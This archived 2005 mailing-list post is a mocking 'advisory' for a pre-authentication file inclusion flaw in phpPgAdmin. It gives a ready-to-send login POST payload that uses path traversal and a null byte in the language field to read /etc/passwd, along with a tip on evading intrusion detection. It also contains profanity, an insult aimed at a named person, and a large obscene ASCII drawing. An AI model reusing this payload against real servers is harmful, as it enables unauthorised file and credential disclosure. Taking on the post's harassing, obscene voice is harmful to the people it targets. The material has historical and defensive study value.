OSEC

Neohapsis is currently accepting applications for employment. For more information, please visit our website www.neohapsis.com or email hr@neohapsis.com
 
[Dailydave] !!! pre-authenticated remote code inclusion vulnerability inside phppgadmin !!!

rznvynqqehushmail.com
Date: Mon Jul 04 2005 - 21:24:37 CDT


-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

NOTE: this advisory complies with draft-christey-wysopal-vuln-
disclosure-00.txt

!!! pre-authenticated remote code inclusion vulnerability inside
phppgadmin !!!

What is this stuff?
        phpPgAdmin is a web-based administration tool for
PostgreSQL. It is perfect for PostgreSQL DBAs, newbies and hosting
services. phpPgAdmin is one of the best database front-ends
available.

you cant get this in stores man!

remote pre-auth file inclusion vulnerability brought to you by bad
method of data
usage, found by twigglestick (also known as vengeful striking
hammer of
god), massive 0day finding ALF member. Remember, DON'T USE THIS
VULNERABILITY TO BREAK
PORN SITES, PORN IS GOOD. ALSO ALL YOU WHITEHATS ARE BAD, VERY VERY
BAD. OK
THNX.

install phppgadmin (http://phppgadmin.sourceforge.net/)
post to login form
formUsername=username&formPassword=password&formServer=0&formLanguag
e=%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f/et
c/passwd%00&submitLogin=Login

*Remeber kiddies, many of stupid IDS will go off when you do this,
so change file!

and saying 'FUCK PETE SHIPLEY' while doing it.

remember programmer, don't include user input directly into the
code, its too easy
to make mistakes, think default deny policy for example, with
explicit allows.
this also is cross-site with server errors working, but we don't
care about that.

bye for now!

|| __ _ __ || <> __ ___ __ _ || <>
 __ ||
|| / \| / _] ||// |//\\ /\|| | /\\ / \ |/ \ _||
/ _] ||//
||/\ ||| | ||_ |<< || || || <__|| | ] |||| || /<>| ||
||_ |<<
|| || \__/| \__] ||\\ || || || ___|| || \__/ || \__| ||
\__] ||\\
                         SSSSSSSSSSSSSSSSSSS
                      SSSSSSSSSSSSSSSSSSSSSSSSS
                    SSSSSSSSSSSSSSSSSSSSSSSSSSSSS
                  SSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSS
                 SSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSS
                SSSSSSSSSSSSSSSSSSSSSSSSSSSSSSS:SSSS
               SSSSSSSSSSSSSSSSSSSSSSSSSSSSSSS:::SSS
              SSSSSSSSSSSSSSSSSSSSSSSSSSSSSS::::::SS
              SSSSSSSSSSSSSSS:::::::::::::::::::::NS
              SSSSSSSSSSSSSS::nnnnnnn,::::::,nnnnnN
              SSSSSSSSSSSSS::':::::::::::::/:::::N
              SSSSSSSNNNNSS:::;oOOo;::::::;oOn
              SSSSSSN::::SS::::::::::::::::::::::N
              SSSSSSN:::::::::::::::::::::::::::::N
               SSSSSSN::::::::::::::::::::::::::::N
                SSSSSSNN:::::::::::::::nNNn:::::::N
                 SSSSSS:N::::::::::::::::::::::::N
                  SSSSS:NN::::::::::::::::::::::N /-----------
- ----------\
                  SSS::::NNN::::::::"NNNNNNN:::N -----/ 0day give
me hard-on \ N:::::::NNN:::::::"NnnN:::N
\ wanna touch it? /
N::::::::::NNN:::::::::::N \---------------------/
                    NN::::::NN::::NNN:::::::N
                   NN::::::::NNN::::NNNNNNNN
                  N::::::::::::NN:::::::N
                NN::::::::::::::NN::::::N
             NNNN:::::::::::::::::N::::N
           NN::::::::::::::::::NNNNNN::N
         NN::::::::::::::::::::::::NNNNN
        N::::::::::::::::::::::::::::NNN
       N:::::::::::::::::::::::::::::::NN
      NN:::::::::::::::::::::::N:::::::::N
      N:::::::::::::::::::::::::N:::::::::N
      N:::::::::::::::::::::::::N::::::::::N
      N:::::::::::::::::::::::::N:::::::::::N
      NN::::::::::::::::::::::::N::::::::::::N
       N:::::::::::::::::::::::N::::::::::::::N
        N:::::::::::::::::::::N::::::::::::::::N
        NN::::::::::::::::::N:N::::::::::::::::N
        N:NN::::::::::::::NN::N::::::::::::::::N
        N:::N::::::::::::N:::::N:::::::::::::::N
       N:::::::::::::::NN::::::N::::::::::::::oo
       N::::::::::::::::::::::::N::::::::::::o
       N::::::::::::::::::::::::N:::::::::::No'
       N::::::::::::::::::::::::N::::::::NNNN
       N::::::::::::::::::::::::N:::::::N:::N
       N::::::::::::::::::::::::N::::::::::NN
       N::::::::::::::::::::::::N:::::::::::N
        N::::::::::::::::::::::N:::::N::::::N
NNNNNNNNNNNN
        N:::N::::::::::::::::::N::::N::::::N
N::::::::::::NN
         N:::N::::::::::::::::N:::::N::::N
NNNN:::::NNNNNNNNNN
        N:::N::::::::::::::NNN::::::N::::N
N::::::::::::::NN

N:::N::::::::::::::::NN::::::N:::NNNNNNNNNNNNNNNNNN:::::::::::()::NN

N:::N:::::::::::::::::NNNNNNNNNNN::::::::::::::::::::::::::::::NNN

N::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::()::NN

N::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::NNN

N::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::()::NN

N::::::N::::::::NNNN::::::::::::::::::::::::NNNN::::::::::::::::NNN

N:::::::N::::::::::::NNNNNNN::::::::::NNNNNNN:::::::::::::::::()::NN

N::::::::N::::::::::::::::::NNNNNNNNNN:::::::::::::::::::::::::::NN

N:::::::::NN:::::::::::::::::::::::::::::::NNNNNNNNNNNNNNNNNNNNNNN
        N:::::::::::NN::::::::::::::::::::::NNNNNNN NNNNN
         N::::::::::::::::::::::::::NNNNNNNN NN:::::0
          NNN::::::::::::NNNNNNNNNNN:::::::N N><::::::N
           N:NNNNNNNNNNNN::::::::::::::::::N NN::><:::::N
          N:::::::::::::::::::::::::::::::N NN:::::><:::N
         N::::::::::::::::::::::::::::::::N NN::::::::><NN
        N::::::::::::::::::::::::::::::::N NN:::::::::NN
       N:::::::::::::::::::::::::::::::::N# NN:::::::::NN
      N::::::::::::::::::::::::::::::::::N##:::::::::NN
      N::::::::::::::::::::::::::::::::::N####:::::NN
      N:::::::::::N::::::::::::::::::::::N####:::NN
      N:::::::::::NN:::::::::::::::::::::N####:NN
      N:::::::::::NNN:::::::::::::::::::NN####N
      N:::::::::::NN:N::::::::::::::::::N######
      N:::::::::::N:::::::::::::::::::::N!#####
       N:::::::::N::::::::::::::::::::::N!!###N
       N::::::::::::::::::::::::::::::::N!!###NN
        N::::::::::::::::::::::::::::::::N!!!!!NN
        NN:::::::::::::::::::::::::::::::N!!!!!N:N
         NN::::::::::::::::::::::::::::::N!!!!!!N:N
          NNN::::::::::::::::::::::::::::N!!!!!!N::N
           NN:::::::::::::::::::::::::::::N!!!!!N:::N
            N:::::::::::::::::::::::::::::N!!!!!!N:::N
            N:::::::::::::::::::::::::::::N!!!!!!:::::N
            N:::::::::::::::::::::::::::::N!!!!!N::::::N
            N:::::::::::::::::::::::::::::N!!!!!N:::::::N
            N:::::::::::::::::::::::::::::N!!!!N:::::::::N
            N:::::::::::::::::::::::::::::NNNNN:::::::::::N
            N::::::::::::::::::::::::::::N:::::::::::::::::N
            N::::::::::::::::::::::::::::N::::::::::::::::::N
            N::::::::::::::::::::::::::::N:::::::::::::::::::N
            N:::::::::::N::::::::::::::::N::::::::::::::::::::N
            N::::::::::N:::::::::::::::::NN::::::::::::::::::::N
            N::::::::::N:::::::::::::::::NNN::::::::::::::::::::N
            N::::::::::N:::::::::::::::::N:NN::::::::::::::::::::N
            N::::::::::N::::::::::::::::N::::NN:::::::::::::::::::N

-----BEGIN PGP SIGNATURE-----
Note: This signature can be verified at https://www.hushtools.com/verify
Version: Hush 2.4

wkYEARECAAYFAkLJ4c0ACgkQZvG4N6tdg63x2gCfYBjgFnFRU6EyEVRQ4IFnm9iLfLoA
nAi4IBh+YFO5EaG2iAaB8LFf6Oxx
=hxv0
-----END PGP SIGNATURE-----

Concerned about your privacy? Follow this link to get
secure FREE email: http://www.hushmail.com/?l=2

Free, ultra-private instant messaging with Hush Messenger
http://www.hushmail.com/services-messenger?l=434

Promote security and make money with the Hushmail Affiliate Program:
http://www.hushmail.com/about-affiliate?l=427

_______________________________________________
Dailydave mailing list
Dailydavelists.immunitysec.com
https://lists.immunitysec.com/mailman/listinfo/dailydave